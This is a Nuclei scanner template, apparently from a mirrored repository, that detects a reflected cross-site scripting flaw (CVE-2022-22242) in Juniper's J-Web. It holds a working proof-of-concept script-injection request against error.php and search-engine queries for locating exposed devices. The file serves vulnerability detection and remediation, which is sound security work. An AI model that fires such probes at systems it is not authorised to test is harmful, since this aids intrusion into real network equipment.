daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2022/CVE-2022-22242.yaml

61 lines
2.9 KiB
YAML
Raw Permalink Blame History

id: CVE-2022-22242
info:
name: Juniper Web Device Manager - Cross-Site Scripting
author: EvergreenCartoons
severity: medium
description: |
Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the latest security patches or updates provided by Juniper Networks to mitigate this vulnerability.
reference:
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
- https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
- https://kb.juniper.net/JSA69899
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-22242
cwe-id: CWE-79
epss-score: 0.43644
epss-percentile: 0.97362
cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: juniper
product: junos
shodan-query:
- title:"Juniper Web Device Manager"
- http.title:"juniper web device manager"
fofa-query: title="juniper web device manager"
google-query: intitle:"juniper web device manager"
tags: cve2022,cve,xss,juniper,junos
http:
- method: GET
path:
- '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "The requested resource is not authorized to view"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a004730450221009dc11da385441b20fefa008fe30a2f64d3f86c3f88be834410002eca142f3b0e022031318c98ea766ad592c15d83c16ceb4d968f230131e11cd53d71430773c7a06b:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink